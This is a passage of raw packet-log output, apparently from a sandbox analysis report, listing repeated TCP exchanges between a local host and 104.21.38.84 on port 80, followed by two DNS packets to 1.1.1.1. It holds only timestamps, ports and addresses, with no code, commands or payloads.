                                                                                                                  Jan 1, 2025 15:05:47.598789930 CET8050306104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:47.598838091 CET5030680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:47.599350929 CET8050307104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:47.599406004 CET5030780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:47.599523067 CET5030780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:47.604242086 CET8050307104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:47.947453022 CET5030780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:47.952317953 CET8050307104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:48.093650103 CET8050307104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:48.134835005 CET5030780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:48.260451078 CET8050307104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:48.308665037 CET5030780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:48.380660057 CET5030780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:48.384654045 CET5030880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:48.385730028 CET8050307104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:48.389472961 CET8050308104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:48.389511108 CET5030780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:48.392818928 CET5030880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:48.392818928 CET5030880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:48.397655010 CET8050308104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:48.744672060 CET5030880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:48.749540091 CET8050308104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:48.898729086 CET8050308104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:48.948661089 CET5030880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:48.979701042 CET5030880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:48.980664968 CET5030980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:48.984829903 CET8050308104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:48.985279083 CET5030880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:48.985455036 CET8050309104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:48.985572100 CET5030980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:48.985729933 CET5030980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:48.990500927 CET8050309104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:49.100655079 CET5031080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:49.105568886 CET8050310104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:49.108742952 CET5031080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:49.108834028 CET5031080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:49.113670111 CET8050310104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:49.338123083 CET5030980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:49.343075991 CET8050309104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:49.343163967 CET8050309104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:49.430078030 CET8050309104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:49.463104010 CET5031080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:49.468003988 CET8050310104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:49.478585005 CET5030980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:49.562329054 CET8050310104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:49.603590965 CET5031080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:49.681708097 CET8050309104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:49.728590012 CET5030980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:49.815809011 CET8050310104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:49.869237900 CET5031080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:49.942660093 CET5026580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:49.942717075 CET5030580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:49.942770004 CET5027280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:49.943470955 CET5030980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:49.943624020 CET5031080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:49.944159985 CET5031180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:49.949012041 CET8050311104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:49.949023008 CET8050309104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:49.949033976 CET8050310104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:49.949105024 CET5030980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:49.949116945 CET5031180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:49.949152946 CET5031080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:49.949246883 CET5031180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:49.953975916 CET8050311104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:50.308670998 CET5031180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:50.313584089 CET8050311104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:50.415116072 CET8050311104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:50.464668036 CET5031180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:50.692413092 CET8050311104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:50.748491049 CET5031180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:50.820678949 CET5031280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:50.825558901 CET8050312104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:50.825659990 CET5031280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:50.828669071 CET5031280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:50.833515882 CET8050312104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:51.184670925 CET5031280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:51.189558029 CET8050312104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:51.430917025 CET8050312104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:51.478591919 CET5031280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:51.696489096 CET8050312104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:51.744230032 CET5031280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:51.871174097 CET5031280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:51.872036934 CET5031380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:51.876326084 CET8050312104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:51.876373053 CET5031280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:51.876950979 CET8050313104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:51.877011061 CET5031380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:51.877151012 CET5031380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:51.881966114 CET8050313104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:52.228779078 CET5031380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:52.233804941 CET8050313104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:52.332365036 CET8050313104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:52.384862900 CET5031380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:52.516904116 CET8050313104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:52.572679996 CET5031380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:52.648678064 CET5031380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:52.648677111 CET5031480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:52.653502941 CET8050314104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:52.653702974 CET8050313104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:52.653812885 CET5031480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:52.653815985 CET5031380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:52.653945923 CET5031480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:52.659020901 CET8050314104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:53.012679100 CET5031480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:53.017553091 CET8050314104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:53.115154982 CET8050314104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:53.166188955 CET5031480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:53.288244009 CET8050314104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:53.337979078 CET5031480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:53.412583113 CET5031180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:53.415673971 CET5031480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:53.417169094 CET5031580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:53.420722008 CET8050314104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:53.420772076 CET5031480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:53.421981096 CET8050315104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:53.422045946 CET5031580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:53.422261000 CET5031580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:53.427018881 CET8050315104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:53.776524067 CET5031580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:53.781856060 CET8050315104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:53.863800049 CET8050315104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:53.916107893 CET5031580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:54.130743027 CET8050315104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:54.181727886 CET5031580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:54.256679058 CET5031580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:54.256686926 CET5031680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:54.261650085 CET8050316104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:54.261868000 CET8050315104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:54.264825106 CET5031580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:54.264826059 CET5031680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:54.264964104 CET5031680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:54.269735098 CET8050316104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:54.620696068 CET5031680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:54.625713110 CET8050316104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:54.700681925 CET5031680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:54.700690985 CET5031780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:54.705584049 CET8050317104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:54.705818892 CET8050316104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:54.705912113 CET5031780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:54.705914021 CET5031680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:54.706100941 CET5031780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:54.710903883 CET8050317104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:54.820899963 CET5031880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:54.825754881 CET8050318104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:54.828766108 CET5031880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:54.828851938 CET5031880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:54.833620071 CET8050318104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:55.060693979 CET5031780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:55.065697908 CET8050317104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:55.065757036 CET8050317104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:55.158133030 CET8050317104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:55.181925058 CET5031880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:55.186816931 CET8050318104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:55.212979078 CET5031780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:55.282248020 CET8050318104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:55.322381973 CET5031880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:55.414653063 CET8050317104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:55.463068008 CET5031780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:55.543432951 CET8050318104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:55.587990999 CET5031880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:55.663834095 CET5031780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:55.663930893 CET5031880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:55.664887905 CET5031980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:55.668869972 CET8050317104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:55.668919086 CET5031780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:55.669209003 CET8050318104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:55.669251919 CET5031880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:55.669728041 CET8050319104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:55.669787884 CET5031980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:55.669874907 CET5031980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:55.674633026 CET8050319104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:56.025616884 CET5031980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:56.030534029 CET8050319104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:56.117726088 CET8050319104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:56.166136026 CET5031980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:56.293292046 CET8050319104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:56.338721037 CET5031980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:56.413971901 CET5032080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:56.414058924 CET5031980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:56.418842077 CET8050320104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:56.419055939 CET5032080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:56.419254065 CET8050319104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:56.419289112 CET5032080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:56.419367075 CET5031980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:56.424034119 CET8050320104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:56.777700901 CET5032080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:56.782568932 CET8050320104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:56.883121967 CET8050320104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:56.934696913 CET5032080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:57.134758949 CET8050320104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:57.181808949 CET5032080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:57.293267965 CET5032180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:57.298077106 CET8050321104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:57.298141956 CET5032180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:57.298294067 CET5032180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:57.303014040 CET8050321104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:57.650635004 CET5032180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:57.679709911 CET8050321104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:57.741199017 CET8050321104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:57.791126013 CET5032180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:58.037164927 CET8050321104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:58.088007927 CET5032180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:58.160306931 CET5032180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:58.160937071 CET5032280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:58.165541887 CET8050321104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:58.165623903 CET5032180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:58.166337967 CET8050322104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:58.166419983 CET5032280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:58.166501999 CET5032280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:58.171534061 CET8050322104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:58.526694059 CET5032280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:58.531665087 CET8050322104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:58.648287058 CET8050322104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:58.697376013 CET5032280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:58.913436890 CET8050322104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:58.963087082 CET5032280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:59.036695957 CET5032280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:59.036704063 CET5032380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:59.041611910 CET8050323104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:59.041791916 CET5032380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:59.041809082 CET8050322104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:59.041846037 CET5032380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:59.042037010 CET5032280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:59.046658039 CET8050323104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:59.400718927 CET5032380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:59.405623913 CET8050323104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:59.491225958 CET8050323104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:59.541126013 CET5032380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:59.751775026 CET8050323104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:59.806765079 CET5032380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:59.869729042 CET5032380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:59.870363951 CET5032480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:59.874701977 CET8050323104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:59.874751091 CET5032380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:59.875154972 CET8050324104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:59.875210047 CET5032480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:59.875296116 CET5032480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:59.880143881 CET8050324104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:06:00.232769012 CET5032480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:06:00.237761974 CET8050324104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:06:00.328824997 CET8050324104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:06:00.388710022 CET5032480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:06:00.420716047 CET5032580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:06:00.420727968 CET5032480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:06:00.425653934 CET8050325104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:06:00.425770998 CET8050324104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:06:00.428814888 CET5032580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:06:00.428814888 CET5032580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:06:00.428831100 CET5032480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:06:00.433687925 CET8050325104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:06:00.584711075 CET5032680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:06:00.589530945 CET8050326104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:06:00.596720934 CET5032680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:06:00.596720934 CET5032680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:06:00.601562977 CET8050326104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:06:00.776729107 CET5032580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:06:00.781677961 CET8050325104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:06:00.781701088 CET8050325104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:06:00.911429882 CET8050325104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:06:00.951009035 CET5032680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:06:00.955845118 CET8050326104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:06:00.960321903 CET5032580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:06:01.039985895 CET8050326104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:06:01.080044985 CET8050325104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:06:01.088737011 CET5032680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:06:01.135902882 CET5032580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:06:01.306884050 CET8050326104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:06:01.353651047 CET5032680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:06:02.063996077 CET5032680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:06:02.063997984 CET5032580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:06:02.065083027 CET5032780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:06:02.069123030 CET8050326104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:06:02.069169998 CET5032680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:06:02.069386959 CET8050325104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:06:02.069427967 CET5032580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:06:02.069900990 CET8050327104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:06:02.069956064 CET5032780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:06:02.070075035 CET5032780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:06:02.074933052 CET8050327104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:06:02.416232109 CET5032780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:06:02.421154976 CET8050327104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:06:02.535738945 CET8050327104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:06:02.681765079 CET5032780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:06:02.796092987 CET8050327104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:06:02.884898901 CET5032780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:06:02.915273905 CET5032880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:06:02.920149088 CET8050328104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:06:02.920222998 CET5032880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:06:02.920319080 CET5032880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:06:02.925098896 CET8050328104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:06:03.278786898 CET5032880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:06:03.283786058 CET8050328104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:06:03.374234915 CET8050328104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:06:03.494848013 CET5032880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:06:03.552412033 CET8050328104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:06:03.676790953 CET5032880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:06:03.677500010 CET5032980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:06:03.681854963 CET8050328104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:06:03.681969881 CET5032880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:06:03.682259083 CET8050329104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:06:03.682362080 CET5032980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:06:03.682476044 CET5032980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:06:03.687222958 CET8050329104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:06:04.041332960 CET5032980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:06:04.046183109 CET8050329104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:06:04.136271954 CET8050329104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:06:04.181813002 CET5032980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:06:04.313020945 CET8050329104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:06:04.353642941 CET5032980192.168.2.4104.21.38.84

                                                                                                                  UDP Packets

                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Jan 1, 2025 15:02:11.104135990 CET5476353192.168.2.41.1.1.1
                                                                                                                  Jan 1, 2025 15:02:11.114093065 CET53547631.1.1.1192.168.2.4

                                                                                                                  DNS Queries

